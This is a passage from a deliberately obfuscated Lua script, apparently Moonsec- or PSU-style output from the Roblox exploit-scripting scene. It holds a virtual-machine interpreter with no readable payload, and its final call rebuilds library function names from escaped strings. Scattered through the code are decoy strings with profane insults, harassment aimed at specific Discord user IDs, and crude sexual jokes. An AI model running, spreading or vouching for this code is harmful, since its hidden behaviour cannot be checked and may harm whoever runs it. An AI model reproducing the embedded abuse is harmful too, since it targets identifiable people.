_ll;__[_[__l_]]={};_l=_l+__l;_=_l_[_l];__[_[__lll]][_[_l__l]]=_[_lll_];_l=_l+__l;_=_l_[_l];__[_[___l]][_[_l__l]]=_[__ll_];_l=_l+__l;_=_l_[_l];__[_[_l__]][_[_ll_]]=_[_l___];_l=_l+__l;_=_l_[_l];__[_[_l__]][_[____]]=_[____l];_l=_l+__l;_=_l_[_l];__[_[_ll_l]][_[____]]=_[_lll_];_l=_l+__l;_=_l_[_l];__[_[__l_]][_[__l_l]]=__[_[_lll_]];_l=_l+__l;_=_l_[_l];_ll=_[__l_];___=__[_ll];for _=_ll+1,_[_l_ll]do _l__ll(___,__[_])end;break end;break;end while 1223==(_ll)/((0x512+-42))do _ll=(8734320)while ___>(0xa5-121)do _ll=-_ll __[_[_l__]][_[_ll_]]=_[__l__];break end while(_ll)/((-#[[this challenge was brought to you by bmcq]]+(0x1041a/26)))==3466 do _____[_[_l__l]]=__[_[__lll]];break end;break;end break;end break;end while 2894==(_ll)/((7918-0xfb5))do _ll=(327746)while(-#[[<@847154787934011462> you stupid motherfucker shut the fuck up]]+(270-0xa0))>=___ do _ll=-_ll _ll=(12002715)while(6900/0x96)>=___ do _ll=-_ll if __[_[__ll]]then _l=_l+__l;else _l=_[_l_ll];end;break;end while(_ll)/((-85+0xc1c))==3981 do _ll=(5118320)while((0x268e/105)+-#"KFC tried to justify urls as fake constants LOL")<___ do _ll=-_ll if(__[_[__ll]]~=_[_l___])then _l=_l+_lll;else _l=_[__l_l];end;break end while 2740==(_ll)/((0x18a08/54))do __[_[__l_]]=(_[_l__l]~=0);_l=_l+_lll;break end;break;end break;end while 3182==(_ll)/(((23064/0x7c)+-83))do _ll=(42135)while ___<=((147+-0x1d)+-#"<@!519139355118534656> stop with the cap ms v3 got my script 30.0 ms")do _ll=-_ll _ll=(711360)while(7938/0xa2)<___ do _ll=-_ll local _l=_[__ll];local _ll=__[_l];for _=_l+1,_[_ll_]do _l__ll(_ll,__[_])end;break end while 1824==(_ll)/((-#"heres a hint: repeat until nil"+(0x9bdc/95)))do __[_[___l]]=__[_[_l_l]][__[_[_lll_]]];break end;break;end while 795==(_ll)/((0xa0-107))do _ll=(1880860)while ___>(175-0x7c)do _ll=-_ll __[_[___l]]=_____[_[_ll_]];break end while(_ll)/((-#[[stfu and paint cat]]+(-0x5f+898)))==2396 do do return __[_[_ll_l]]end break end;break;end break;end break;end break;end break;end break;end while 1767==(_ll)/(((0x712+-119)+-#"shut the fuck up no one loves u"))do _ll=(14303808)while(0x924/30)>=___ do _ll=-_ll _ll=(226630)while ___<=(0x514/20)do _ll=-_ll _ll=(10809423)while(5278/0x5b)>=___ do _ll=-_ll _ll=(1051105)while ___<=(0x2e68/216)do _ll=-_ll _ll=(10832899)while(3975/0x4b)>=___ do _ll=-_ll local _=_[_ll_l]__[_](__[_+_lll])break;end while 2959==(_ll)/((0x1cf1-3748))do _ll=(8360714)while(9018/0xa7)<___ do _ll=-_ll __[_[__ll]]=_[_l_ll];break end while(_ll)/((3903+-0x7d))==2213 do local _lll;local ___;local _ll;__[_[___l]]=___ll[_[_l_l]];_l=_l+__l;_=_l_[_l];_ll=_[__ll];___=__[_[_ll_]];__[_ll+1]=___;__[_ll]=___[_[_ll__]];_l=_l+__l;_=_l_[_l];__[_[___l]]=_[_l__l];_l=_l+__l;_=_l_[_l];_ll=_[_l__]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[____]))_l=_l+__l;_=_l_[_l];___=_[____];_lll=__[___]for _=___+1,_[__ll_]do _lll=_lll..__[_];end;__[_[__l_]]=_lll;_l=_l+__l;_=_l_[_l];__[_[__l_]][_[____]]=__[_[____l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=_[_ll_];_l=_l+__l;_=_l_[_l];__[_[___l]]=___ll[_[_l_l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[_l__l]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_ll_]][_[____l]];break end;break;end break;end while 659==(_ll)/((-0x6e+1705))do _ll=(686392)while(0xd8-160)>=___ do _ll=-_ll local ___=_l_lll[_[_l__l]];local __l;local _ll={};__l=___l_l({},{__index=function(_l,_)local _=_ll[_];return _[1][_[2]];end,__newindex=function(__,_,_l)local _=_ll[_]_[1][_[2]]=_l;end;});for __l=1,_[_lll_]do _l=_l+_lll;local _=_l_[_l];if _[(94/0x5e)]==96 then _ll[__l-1]={__,_[____]};else _ll[__l-1]={_____,_[__l_l]};end;___lll[#___lll+1]=_ll;end;__[_[___l]]=__llll(___,__l,___ll);break;end while 824==(_ll)/((87465/0x69))do _ll=(5059920)while(227-0xaa)<___ do _ll=-_ll local _=_[___l]__[_](__[_+_lll])break end while(_ll)/((0xb30-1472))==3635 do local _ll;___ll[_[____]]=__[_[___l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=___ll[_[_l__l]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=_[__l_l];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];do return end;break end;break;end break;end break;end while 3249==(_ll)/((-#[[i dont care that this was enchanted with uncrackable V]]+(0xd54+-31)))do _ll=(513291)while(-84+0x91)>=___ do _ll=-_ll _ll=(6137532)while(0x81+-70)>=___ do _ll=-_ll __[_[___l]]=__llll(_l_lll[_[_ll_]],nil,___ll);break;end while 2991==(_ll)/((0x1054-2128))do _ll=(5138250)while(10680/0xb2)<___ do _ll=-_ll local _l=_[___l]__[_l](_l_l_(__,_l+_lll,_[_l_l]))break end while 3875==(_ll)/((2673-0x543))do local _ll=_[__ll];local _l_=__[_ll+2];local __l=__[_ll]+_l_;__[_ll]=__l;if(_l_>0)then if(__l<=__[_ll+1])then _l=_[_l_ll];__[_ll+3]=__l;end elseif(__l>=__[_ll+1])then _l=_[__l_l];__[_ll+3]=__l;end break end;break;end break;end while 989==(_ll)/(((0x1cc3c/215)+-#[[hint: the script is in line 1]]))do _ll=(13329420)while ___<=(-#'sexy'+(0xf7-180))do _ll=-_ll _ll=(1850180)while(496/0x8)<___ do _ll=-_ll local _ll=_[__ll]local _l_={__[_ll](_l_l_(__,_ll+1,___l_))};local _l=0;for _=_ll,_[__l__]do _l=_l+__l;__[_]=_l_[_l];end break end while 2342==(_ll)/(((-#'<@519139355118534656>'+(123552/0x8f))+-0x35))do if(__[_[__ll]]==_[____l])then _l=_l+_lll;else _l=_[____];end;break end;break;end while 3715==(_ll)/((828828/0xe7))do _ll=(4174130)while ___>(14912/0xe9)do _ll=-_ll _____[_[_ll_]]=__[_[___l]];break end while 1663==(_ll)/((5072-0xa02))do local _ll=_[__lll];local _l=__[_[_l_ll]];__[_ll+1]=_l;__[_ll]=_l[_[_l___]];break end;break;end break;end break;end break;end while 1310==(_ll)/(((0x1d3-254)+-#[[Found an xxxxxxxxxl store for ur fat mom]]))do _ll=(3584217)while ___<=(0xa5+-94)do _ll=-_ll _ll=(4331328)while((0x5656-11086)/0xa2)>=___ do _ll=-_ll _ll=(3053464)while((0x2648/98)+-#'Nice constant dumper you got there')>=___ do _ll=-_ll __[_[__ll]][__[_[____]]]=__[_[__l__]];break;end while 956==(_ll)/((0xc8b+-17))do _ll=(1934104)while ___>(-0x50+147)do _ll=-_ll if(__[_[__lll]]==_[__ll_])then _l=_l+_lll;else _l=_[__l_l];end;break end while(_ll)/((340228/(-#"federal is watching"+(20646/0x5d))))==1154 do ___ll[_[_ll_]]=__[_[__ll]];_l=_l+__l;_=_l_[_l];__[_[__l_]]={};_l=_l+__l;_=_l_[_l];__[_[_l__]]={};_l=_l+__l;_=_l_[_l];___ll[_[_l_l]]=__[_[__l_]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=___ll[_[_l__l]];_l=_l+__l;_=_l_[_l];if(__[_[__lll]]==_[__ll_])then _l=_l+_lll;else _l=_[__l_l];end;break end;break;end break;end while 2654==(_ll)/((((0x1ade-3476)-0x6e2)+-#"im dying"))do _ll=(1815387)while ___<=(16629/0xf1)do _ll=-_ll if(__[_[__ll]]~=__[_[__l__]])then _l=_l+_lll;else _l=_[__l_l];end;break;end while 959==(_ll)/((-0x2c+1937))do _ll=(1180598)while(0xa9-99)<___ do _ll=-_ll __[_[__ll]]=(_[_l_ll]~=0);_l=_l+_lll;break end while 821==(_ll)/(((157456/0x68)+-#[[This code was obfuscated using PSU, which stands for Penis Sucking Utilities]]))do for _=_[__ll],_[_l_l]do __[_]=nil;end;break end;break;end break;end break;end while 2073==(_ll)/((0xb65b/27))do _ll=(5572314)while ___<=(0x3b8c/206)do _ll=-_ll _ll=(11974284)while(-24+(0xc6+-102))>=___ do _ll=-_ll do return end;break;end while 3948==(_ll)/((6150-0xc2d))do _ll=(3055247)while(-#[[do while true do end end]]+(0x38d6/150))<___ do _ll=-_ll __[_[___l]]=(_[_l_ll]~=0);break end while 2587==(_ll)/((-0x60+1277))do local _l=_[__lll]local _l_={__[_l](__[_l+1])};local _ll=0;for _=_l,_[_lll_]do _ll=_ll+__l;__[_]=_l_[_ll];end break end;break;end break;end while(_ll)/(((0xfdb-2091)+-#'stOP READING MY CODE!'))==2862 do _ll=(1352384)while(-#[[give access to functions for boosters]]+(236+-0x7b))>=___ do _ll=-_ll _ll=(875976)while ___>((0x1b87/(11136/0x80))+-#'it7ucd')do _ll=-_ll local _ll;local ___;local ___l,_ll_l;local _llll;local _ll;__[_[__l_]]=__[_[_ll_]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=___ll[_[_l_ll]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=___ll[_[_l_l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[____]][_[__l__]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=__[_[____]][_[__l__]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[_l_ll]][_[__l__]];_l=_l+__l;_=_l_[_l];_ll=_[_l__];_llll=__[_[_l_l]];__[_ll+1]=_llll;__[_ll]=_llll[_[_ll__]];_l=_l+__l;_=_l_[_l];_ll=_[__lll]___l,_ll_l=_lllll(__[_ll](__[_ll+_lll]))___l_=_ll_l+_ll-__l ___=0;for _=_ll,___l_ do ___=___+__l;__[_]=___l[___];end;_l=_l+__l;_=_l_[_l];_ll=_[__lll]___l={__[_ll](_l_l_(__,_ll+1,___l_))};___=0;for _=_ll,_[__ll_]do ___=___+__l;__[_]=___l[___];end _l=_l+__l;_=_l_[_l];_l=_[____];break end while 1292==(_ll)/((0x308+-98))do local _ll=_[___l]local _l_={__[_ll](__[_ll+1])};local _l=0;for _=_ll,_[_ll__]do _l=_l+__l;__[_]=_l_[_l];end break end;break;end while 1243==(_ll)/((0x3b3c0/223))do _ll=(3026092)while(227-0x96)<___ do _ll=-_ll __[_[_l__]][_[_ll_]]=_[__l__];break end while(_ll)/(((-0x2c+2819)+-#"hint: the script is in line 1"))==1102 do __[_[_ll_l]]=__[_[_ll_]][_[_ll__]];break end;break;end break;end break;end break;end break;end while 3921==(_ll)/((-#"This file has been enchanted with uncrackable V, fuck the fuck off"+(0x854a6/147)))do _ll=(1129388)while(-#[[You know lua? name every metamethod - skids of v3rm]]+(0x18f-257))>=___ do _ll=-_ll _ll=(7721838)while ___<=(0xb3+-95)do _ll=-_ll _ll=(1417984)while(0x7f+-46)>=___ do _ll=-_ll _ll=(2948895)while ___<=(254-0xaf)do _ll=-_ll local _={__,_};_[_lll][_[_llll][___l]]=_[__l][_[_llll][__ll_]]+_[_lll][_[_llll][_l_l]];break;end while(_ll)/((0x6bf-872))==3449 do _ll=(3779272)while ___>(0x7c+(43+-0x57))do _ll=-_ll local ___l;local ___;local _ll;__[_[__ll]]=_[_l_ll];_l=_l+__l;_=_l_[_l];__[_[__l_]]=___ll[_[_l_ll]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=___ll[_[_ll_]];_l=_l+__l;_=_l_[_l];_ll=_[__l_];___=__[_[_ll_]];__[_ll+1]=___;__[_ll]=___[_[__ll_]];_l=_l+__l;_=_l_[_l];__[_[_ll_l]]=_[_l_l];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[_l__l]))_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_ll_]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[____]][_[__ll_]];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];___=_[_l__l];___l=__[___]for _=___+1,_[__ll_]do ___l=___l..__[_];end;__[_[__ll]]=___l;break end while 2177==(_ll)/((1833+-0x61))do local ___=_l_lll[_[__l_l]];local __l;local _ll={};__l=___l_l({},{__index=function(_l,_)local _=_ll[_];return _[1][_[2]];end,__newindex=function(__,_,_l)local _=_ll[_]_[1][_[2]]=_l;end;});for __l=1,_[_l___]do _l=_l+_lll;local _=_l_[_l];if _[((-100+0x6d)+-#"im dying")]==96 then _ll[__l-1]={__,_[_l_ll]};else _ll[__l-1]={_____,_[_l_ll]};end;___lll[#___lll+1]=_ll;end;__[_[_l__]]=__llll(___,__l,___ll);break end;break;end break;end while 764==(_ll)/((-#[[Cy was here]]+(3794-0x787)))do _ll=(643586)while ___<=(0xf9-167)do _ll=-_ll local _ll=_[_l_ll];local _l=__[_ll]for _=_ll+1,_[__l__]do _l=_l..__[_];end;__[_[__l_]]=_l;break;end while(_ll)/((0x1e2+-91))==1646 do _ll=(5450766)while(19837/0xef)<___ do _ll=-_ll do return __[_[__lll]]end break end while(_ll)/(((320656/0xc4)+-#'not using moonsec is like jumping of a bridge'))==3426 do local ___;local _ll;__[_[_ll_l]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];_ll=_[__l_];___=__[_[__l_l]];__[_ll+1]=___;__[_ll]=___[_[_lll_]];_l=_l+__l;_=_l_[_l];__[_[___l]]=_[_l_ll];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[____]))_l=_l+__l;_=_l_[_l];_ll=_[__l_];___=__[_[_l_l]];__[_ll+1]=___;__[_ll]=___[_[__ll_]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_l_l]];_l=_l+__l;_=_l_[_l];_ll=_[_l__]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[____]))_l=_l+__l;_=_l_[_l];__[_[__l_]]={};_l=_l+__l;_=_l_[_l];__[_[__lll]][_[_ll_]]=_[__l__];_l=_l+__l;_=_l_[_l];__[_[__l_]]=___ll[_[_ll_]];break end;break;end break;end break;end while(_ll)/(((0xbd8f8/188)+-#[[Cannnn Iiiiiiiii put my ballzzzzzz in your jawwwwwww?]]))==1894 do _ll=(6473139)while(-20+0x6b)>=___ do _ll=-_ll _ll=(11011860)while(0x11e-201)>=___ do _ll=-_ll local _l=_[_ll_l]__[_l](_l_l_(__,_l+_lll,_[_l_l]))break;end while 3930==(_ll)/((-49+0xb23))do _ll=(1370125)while ___>(-#'Moonsec win'+(1164/0xc))do _ll=-_ll __[_[__ll]]=__[_[_ll_]]-__[_[_ll__]];break end while 485==(_ll)/(((2868+-0x1e)+-#'unban fiusen?'))do __[_[__lll]][__[_[_l__l]]]=__[_[__l__]];break end;break;end break;end while(_ll)/((189141/0x43))==2293 do _ll=(2662029)while ___<=(-#'troll the teibal'+((336-0xb9)+-46))do _ll=-_ll _ll=(446622)while ___>(-#[[You burned a minor!?!?]]+(292-0xb6))do _ll=-_ll local _ll=_[___l];local __l=__[_ll]local _l_=__[_ll+2];if(_l_>0)then if(__l>__[_ll+1])then _l=_[_l_l];else __[_ll+3]=__l;end elseif(__l<__[_ll+1])then _l=_[_l_ll];else __[_ll+3]=__l;end break end while(_ll)/(((-67+0x11db)-0x8f5))==202 do _l=_[____];break end;break;end while 1303==(_ll)/((439245/0xd7))do _ll=(753912)while ___>(224-0x86)do _ll=-_ll local _ll;__[_[_ll_l]]=__[_[_ll_]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[__l_l]];_l=_l+__l;_=_l_[_l];_ll=_[_l__]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[_ll_l]]=_[____];_l=_l+__l;_=_l_[_l];_ll=_[___l]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[_l_ll]))_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[____]][_[_ll__]];break end while 444==(_ll)/(((-#'FREE LUA OBFUSCATOR DOWNLOAD REAL NO FAKE 2024'+(-0x57+3580))-1749))do local _=_[_l__]__[_]=__[_](__[_+_lll])break end;break;end break;end break;end break;end while(_ll)/((1027+((-322/0xe)+-#'obfuscated with proxide shitting utilities')))==1174 do _ll=(527364)while ___<=(-78+0xb0)do _ll=-_ll _ll=(847036)while ___<=((314-0xb6)+-#[[You know c#? What does << operator do?]])do _ll=-_ll _ll=(108596)while ___<=(-#'moonsec v4 out now'+(-0x72+224))do _ll=-_ll __[_[__lll]][_[_l_l]]=__[_[____l]];break;end while 1597==(_ll)/((0x3fc0/240))do _ll=(2768238)while(0x1b3f/75)<___ do _ll=-_ll local _ll;__[_[_l__]]=___ll[_[_l__l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=__[_[____]];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[____]][_[_lll_]];_l=_l+__l;_=_l_[_l];_ll=_[__l_]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];if(__[_[_l__]]~=_[____l])then _l=_l+_lll;else _l=_[_l_l];end;break end while 1271==(_ll)/((450846/0xcf))do if(__[_[__ll]]~=_[__ll_])then _l=_l+_lll;else _l=_[_l_l];end;break end;break;end break;end while 2308==(_ll)/((0xd9e8/152))do _ll=(4172586)while(258-0xa2)>=___ do _ll=-_ll _ll=(1745713)while ___>(0x137-216)do _ll=-_ll __[_[__lll]]=__[_[_l__l]];break end while(_ll)/((0x20d9e/38))==493 do local _=_[__l_]local _ll,_l=_lllll(__[_](__[_+_lll]))___l_=_l+_-__l local _l=0;for _=_,___l_ do _l=_l+__l;__[_]=_ll[_l];end;break end;break;end while 1986==(_ll)/((0x10e9-2228))do _ll=(4726500)while(0xa1+-64)<___ do _ll=-_ll __[_[__ll]]=__llll(_l_lll[_[_ll_]],nil,___ll);break end while 3151==(_ll)/((0xc10-1588))do local _ll;local ___;local __ll,_l_l;local _ll;__[_[__l_]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[___l]]=(_[_ll_]~=0);_l=_l+__l;_=_l_[_l];_ll=_[___l]__ll,_l_l=_lllll(__[_ll](__[_ll+_lll]))___l_=_l_l+_ll-__l ___=0;for _=_ll,___l_ do ___=___+__l;__[_]=__ll[___];end;_l=_l+__l;_=_l_[_l];_ll=_[___l]__ll={__[_ll](_l_l_(__,_ll+1,___l_))};___=0;for _=_ll,_[_l___]do ___=___+__l;__[_]=__ll[___];end _l=_l+__l;_=_l_[_l];_l=_[_ll_];break end;break;end break;end break;end while(_ll)/((-#[[This file has been enchanted with uncrackable V, fuck the fuck off]]+(-0x43+904)))==684 do _ll=(1118349)while(0x386b/143)>=___ do _ll=-_ll _ll=(5709664)while ___<=(0x104-161)do _ll=-_ll local _ll;__[_[__l_]]=__[_[_l_l]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=___ll[_[__l_l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=__[_[____]];_l=_l+__l;_=_l_[_l];_ll=_[__lll]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[__ll]]=_[__l_l];_l=_l+__l;_=_l_[_l];_ll=_[_l__]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[_ll_]))_l=_l+__l;_=_l_[_l];__[_[___l]]=__[_[_l__l]][_[_ll__]];_l=_l+__l;_=_l_[_l];if(__[_[__l_]]~=__[_[____l]])then _l=_l+_lll;else _l=_[_l__l];end;break;end while 1808==(_ll)/((0x73a64/150))do _ll=(2241918)while((0xd1+-88)+-#"free nitro, not virus")<___ do _ll=-_ll if not __[_[_ll_l]]then _l=_l+_lll;else _l=_[_l_l];end;break end while 3402==(_ll)/(((-0x7f+830)+-#"fed why copy ms priv bot and make it psu bot"))do __[_[__ll]]=_[____];break end;break;end break;end while 313==(_ll)/((((0xa46a0/183)+-#"fuck uncrackable V all my homies use unmethable V")+-0x3a))do _ll=(7056840)while ___<=(250-0x93)do _ll=-_ll _ll=(731769)while(284-0xb6)<___ do _ll=-_ll if(__[_[_l__]]==__[_[__ll_]])then _l=_l+_lll;else _l=_[_ll_];end;break end while(_ll)/((749-0x18c))==2073 do if not __[_[_ll_l]]then _l=_l+_lll;else _l=_[____];end;break end;break;end while 2168==(_ll)/((0x19b1-3322))do _ll=(875196)while(0xbe+-86)<___ do _ll=-_ll __[_[_l__]]=__[_[____]][_[_lll_]];break end while 453==(_ll)/((-103+0x7f3))do do return end;break end;break;end break;end break;end break;end break;end break;end _l=_l+__l;end;end);end;return __llll(_ll_ll(),{},__l__l())()end)_msec({[(0x102-148)]='\115\116'..(function(_)return(_ and'سقجؠق؃زضحسضقضئڪسسڪد')or'\114\105'or'\120\58'end)((0x4e2/250)==(-#'1 + 1 = 111'+(2567/0x97)))..'\110g',["ؠزڪحسزڪضجقجك"]='\108\100'..(function(_)return(_ and'زك؃ڪټآټحڪنسڝآزڪقڝئق')or'\101\120'or'\119\111'end)((-63+((25984/0xe8)+-#[[fucking fuck fuck fucks fucker fucking fucka]]))==(84-0x4e))..'\112',["؃سدضڝڪددنضح"]=(function(_)return(_ and'ك؃دقضكئټدضنضڪټدآآز')and'\98\121'or'\100\120'end)((45-0x28)==(-0x54+89))..'\116\101',["ئز؃؃ؠؠضنؠ"]='\99'..(function(_)return(_ and'حجضنضآؠدقدآ')and'\90\19\157'or'\104\97'end)((121-0x74)==((-0x15+107)-0x53))..'\114',[((140448/0xe0)+-#[[hank hub is skidded wtf!1!1!]])]='\116\97'..(function(_)return(_ and'؃دضجضضنسئؠجئڝحك')and'\64\113'or'\98\108'end)(((182-0x65)+-#[[Banned for: pornographic gif of roblox character having sex with roblox dog]])==(-#"Moonsec v6 coming out in 1 day"+(0xaa-(-#[[federal is an asshole]]+(0x4c2c/125)))))..'\101',["آكندنڪؠدؠدزق؃ئ؃ن؃ضق"]=(function(_)return(_ and'نڪ؃ؠكدضزؠؠزؠسجڝسؠټ')or'\115\117'or'\78\107'end)((0x219/179)==(5177/0xa7))..'\98',["ټآئحسؠڝؠدح؃س"]='\99\111'..(function(_)return(_ and'ټدټنجحڪآڪقسجنض')and'\110\99'or'\110\105\103\97'end)((143-0x70)==(-#"fucking fuck fuck fucks fucker fucking fucka"+(-0x59+164)))..'\97\116',[(((0x4f9eaa/214)/37)+-#"guys listen... sussex XD")]=(function(_,_l)return(_ and'زئئټؠسضقسدحڝجآزټؠ')and'\48\159\158\188\10'or'\109\97'end)((31+-0x1a)==(-#[[moonsec v5 coming in 10 days]]+(0xa7e/79)))..'\116\104',[((2798+-0x64)-0x566)]=(function(_,_l)return((0x285/129)==(0x42+-63)and'\48'..'\195'or _..((not'\20\95\69'and'\90'..'\180'or _l)))or'\199\203\95'end),["كڪنئح؃سؠسټڝجټز"]='\105\110'..(function(_,_l)return(_ and'جق؃ټنزز؃')and'\90\115\138\115\15'or'\115\101'end)(((-17-0x2)+0x18)==(0x18d3/205))..'\114\116',["جكآقزكقز"]='\117\110'..(function(_,_l)return(_ and'ڝؠؠسؠج؃كآ؃ڪؠك')or'\112\97'or'\20\38\154'end)((0x60-((3780/0x24)+-#'PSU Protected!'))==((-0x21+118)+-#[[make sure armando.rar isnt in ur fucking config folder]]))..'\99\107',["كؠؠدنڪ؃نسقزقكق"]='\115\101'..(function(_)return(_ and'ضنضټح؃زئڪقنحئضكقكح')and'\110\112\99\104'or'\108\101'end)(((152-0x6c)+-#[[There is no such thing as a coincidence]])==(-125+0x9c))..'\99\116',["ټكحجحزحڝټدضڪزسڪقنز"]='\116\111\110'..(function(_,_l)return(_ and'حزحزكدكنسقكئضڪكحڝسآ')and'\117\109\98'or'\100\97\120\122'end)((124-0x77)==(0x66+-97))..'\101\114'},{["زكك؃ټآنحآئكڪضجس؃ڝ"]=((getfenv)or(function()return(_ENV)end))},((getfenv)or(function()return(_ENV)end))()) end)()


